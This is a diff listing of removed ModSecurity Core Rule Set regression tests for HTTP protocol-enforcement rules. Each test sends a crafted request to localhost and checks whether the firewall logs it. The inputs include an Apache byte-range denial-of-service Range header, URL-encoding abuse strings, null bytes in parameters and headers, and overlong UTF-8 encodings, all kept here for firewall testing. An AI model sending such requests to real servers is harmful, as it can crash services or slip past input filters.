dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
uri: "/"
output:
log_contains: "id \"920170\""
- # Head Request with data
test_title: 920170-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "HEAD"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
uri: "/"
output:
log_contains: "id \"920170\""
- # GET Request but content length is 0 and data is provided
# Weird HTTP 1.0 support bug in Apache, without newline causes 408
test_title: 920170-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests # Possibly shouldn't pass"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "0"
data: "hi=test\r\n"
stop_magic: true
protocol: "http"
uri: "/"
output:
no_log_contains: "id \"920170\""
- # GET request with content length 0 and no data.
test_title: 920170-6
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "0"
data: ""
protocol: "http"
uri: "/"
output:
no_log_contains: "id \"920170\""
- test_title: 920170-7
desc: GET or HEAD Request with Body Content (920170) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.0
data: abc
output:
log_contains: id "920170"

82
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml vendored
View file

@ -1,82 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920180.yaml"
description: "Description"
tests:
- test_title: 920180-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
protocol: "http"
stop_magic: true
uri: "/"
output:
log_contains: id "920180"
- test_title: 920180-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
protocol: "http"
uri: "/"
output:
no_log_contains: id "920180"
- test_title: 920180-3
desc: POST request missing Content-Length Header (920180) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "920180"
- test_title: 920180-4
desc: Ignore check of CT header if protocol is HTTP/2
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/2.0
output:
no_log_contains: id "920180"

33
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml vendored
View file

@ -1,33 +0,0 @@
---
meta:
author: "fgsch"
enabled: true
name: "920181.yaml"
description: "Description"
tests:
- test_title: 920181-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
uri: "/"
headers:
Host: "localhost"
Accept: "*/*"
Content-Length: 7
Content-Type: "application/x-www-form-urlencoded"
Transfer-Encoding: "chunked"
User-Agent: "ModSecurity CRS 3 Tests"
data: |
7
foo=bar
0
stop_magic: true
output:
# Apache unsets the Content-Length header if
# Transfer-Encoding is found!
no_log_contains: id "920181"

44
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml vendored
View file

@ -1,44 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920190.yaml"
description: "Description"
tests:
- test_title: 920190-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Range: "0-1"
protocol: "http"
uri: "/"
output:
no_log_contains: id "920190"
- test_title: 920190-2
desc: 'Range: Invalid Last Byte Value (920190) from old modsec regressions'
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Connection: close
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920190"

150
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml vendored
View file

@ -1,150 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920200.yaml"
description: "Description"
tests:
- test_title: 920200-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Range: "bytes=1-10,11-20,21-30,31-40,41-50,51-60"
output:
log_contains: "id \"920200\""
- # Sample taken from https://github.com/alienwithin/php-utilities/blob/master/apache-byte-range-server-dos/apache_byte_range_server_dos.php
test_title: 920200-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Request-Range: "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10,11-11"
output:
log_contains: "id \"920200\""
- test_title: 920200-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Range: "bytes=1-10, 11-20, 21-30, 31-40, 41-50"
output:
no_log_contains: "id \"920200\""
- test_title: 920200-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests #FP"
Host: "localhost"
Range: "bytes=-10,-, 21-30,31-40,41-50,51-500,"
output:
log_contains: "id \"920200\""
- test_title: 920200-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests #FP"
Host: "localhost"
Range: "bytes=1-,11-20, 21-30,31-40,41-50,51-500"
output:
log_contains: "id \"920200\""
- test_title: 920200-6
desc: 'Range: Too many fields (920200) from old modsec regressions'
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Connection: close
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920200"
- test_title: 920200-7
desc: This should PASS (PL2)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: bytes=10-11, 20-21, 30-31, 40-41, 50-51
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.html
output:
no_log_contains: id "920200"
- test_title: 920200-8
desc: "This should FAIL with rule 920200 (PL2)"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.html
output:
log_contains: id "920200"
- test_title: 920200-9
desc: This should PASS (PL2)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.pdf
output:
no_log_contains: id "920200"
- test_title: 920200-10
desc: This should PASS (PL2)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.pdf
output:
no_log_contains: id "920200"

22
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml vendored
View file

@ -1,22 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920201.yaml"
description: "Tests for 920201"
tests:
- test_title: 920201-1
desc: This should FAIL with rule 920201 (PL2)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341, 350-351, 360-361, 370-371, 380-381, 390-391, 400-401, 410-411, 420-421, 430-431, 440-441, 450-451, 460-461, 470-471, 480-481, 490-491, 500-501, 510-511, 520-521, 530-531, 540-541, 550-551, 560-561, 570-571, 580-581, 590-591, 600-601, 610-611, 620-621, 630-631"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.pdf
output:
log_contains: id "920201"

22
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml vendored
View file

@ -1,22 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920202.yaml"
description: "Tests for 920202"
tests:
- test_title: 920202-1
desc: This should FAIL with rule 920202 (PL4)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.pdf
output:
log_contains: id "920202"

109
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml vendored
View file

@ -1,109 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920210.yaml"
description: "Tests that trigger rule 920210"
tests:
- test_title: 920210-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "keep-alive"
output:
no_log_contains: "id \"920210\""
- test_title: 920210-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "keep-alive,keep-alive"
output:
log_contains: "id \"920210\""
- test_title: 920210-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "keep-alive,close"
output:
log_contains: "id \"920210\""
- test_title: 920210-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "close,close"
output:
log_contains: "id \"920210\""
- test_title: 920210-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "User-Agent"
output:
no_log_contains: "id \"920210\""
- test_title: 920210-6
desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Connection: keep-alive, keep-alive
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920210"
- test_title: 920210-7
desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Connection: close, close
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920210"

72
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml vendored
View file

@ -1,72 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920220.yaml"
description: "Tests to trigger rule 920220"
tests:
- # This gets a percent but not a number after, invalid
test_title: 920220-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?x=%w20"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920220\""
- # We have a valid percent encoding here
test_title: 920220-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?x=xyz%20%99"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920220\""
- # url encoding includes spaces as plusses, this is valid
test_title: 920220-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=This+is+a+test"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920220\""
- # testURL Encoding Abuse Attack Attempt from old modsec regressions
test_title: 920220-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?parm=%7%6F%6D%65%74%65%78%74%5F%31%32%33%"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920220\""
- # testURL Encoding Abuse Attack Attempt from old modsec regressions
test_title: 920220-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?parm=%1G"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920220\""

43
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml vendored
View file

@ -1,43 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920230.yaml"
description: "Description"
tests:
- # From old modsec regression tests
test_title: 920230-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?parm=%25%37%33%25%36%46%25%36%44%25%36%35%25%37%34%25%36%35%25%37%38%25%37%34%25%35%46%25%33%31%25%33%32%25%33%33%25%33%34"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920230\""
- # From old modsec regression tests
test_title: 920230-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?parm=%7%6F%6D%65%74%65%78%74%5F%31%32%33%"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
no_log_contains: "id \"920230\""

123
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml vendored
View file

@ -1,123 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920240.yaml"
description: "Description"
tests:
- test_title: 920240-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: 11
data: "x=new %w20$"
stop_magic: true
output:
log_contains: "id \"920240\""
- test_title: 920240-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests #FN This should Trigger"
Host: "localhost%00"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: 10
data: "x=new %20$"
stop_magic: true
output:
no_log_contains: "id \"920240\""
- test_title: 920240-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "param=value"
output:
no_log_contains: "id \"920240\""
- # We have a valid percent encoding here
test_title: 920240-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
Content-Type: "text/xml"
data: |
<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">
<SOAP-ENV:Body>
<xkms:StatusRequest xmlns:xkms=\"http://www.w3.org/2002/03/xkms#\" Id=\"_6ee48478-fdd6-4d7d-b1bf-e7b4c3254659\" ResponseId=\"_c1c36b3f-f962-4aea-bfbd-07ed58468c9b\" Service=\"http://www.soapclient.com/xml/xkms2\">
<xkms:ResponseMechanism>http://www.w3.org/2002/03/xkms#Pending</xkms:ResponseMechanism>
<xkms:RespondWith>%1Gwww.attack.org</xkms:RespondWith>
</xkms:StatusRequest>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
output:
no_log_contains: "id \"920240\""
- # test URL Encoding Abuse Attack Attempt from old regression tests
test_title: 920240-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "9"
data: "param=%1G"
stop_magic: true
output:
log_contains: "id \"920240\""
- # test URL Encoding Abuse Attack Attempt from old regression tests
test_title: 920240-6
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
Content-Type: "application/x-www-form-urlencoded"
data: "param=%7%6F%6D%65%74%65%78%74%5F%31%32%33%"
output:
log_contains: "id \"920240\""

62
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml vendored
View file

@ -1,62 +0,0 @@
---
meta:
author: "csanders-git"
enabled: false
name: "920250.yaml"
description: "Description"
tests:
- # crs-setup.conf needs to have CRS_VALIDATE_UTF8_ENCODING set
# Taken from existing modsec regression
test_title: 920250-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=%c0%af"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920250\""
- # Taken from existing modsec regression
test_title: 920250-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=%c0"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920250\""
- # Taken from existing modsec regression
test_title: 920250-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=%F5%80%BF%BF"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920250\""

50
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml vendored
View file

@ -1,50 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920260.yaml"
description: "Description"
tests:
- test_title: 920260-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=%uff0F"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920260\""
- test_title: 920260-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=%u0F"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920260\""
- # Test taken from existing modsec regression
test_title: 920260-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=foo%uFF01"
version: "HTTP/1.0"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920260\""

125
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml vendored
View file

@ -1,125 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920270.yaml"
description: "Description"
tests:
- test_title: 920270-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%00=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920270\""
- test_title: 920270-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%00"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920270\""
- test_title: 920270-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%00=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920270\""
- # This causes apache to error before it gets to CRS. Therefore
# we'll mark this as a status 400 now until the FTW OR output is added
test_title: 920270-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost%00"
output:
status: [403, 400]
# log_contains: "id \"920270\""
- test_title: 920270-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Referer: "anything%00"
output:
log_contains: "id \"920270\""
- test_title: 920270-6
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%40=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920270\""
- test_title: 920270-7
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%FD=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920270\""
- test_title: 920270-8
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%FD=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920270\""
- # Test converted from old tests
test_title: 920270-9
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=foo%00"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920270\""

80
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml vendored
View file

@ -1,80 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920271.yaml"
description: "Description"
tests:
- test_title: 920271-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%127"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920271\""
- test_title: 920271-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%03"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920271\""
- test_title: 920271-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%00=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920271\""
- test_title: 920271-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cookie: hi%13=bye
output:
log_contains: "id \"920271\""
- test_title: 920271-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/%20index.html?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920271\""
- test_title: 920271-6
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/%FFindex.html?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920271\""

68
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml vendored
View file

@ -1,68 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920272.yaml"
description: "Description"
tests:
- test_title: 920272-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%25"
headers:
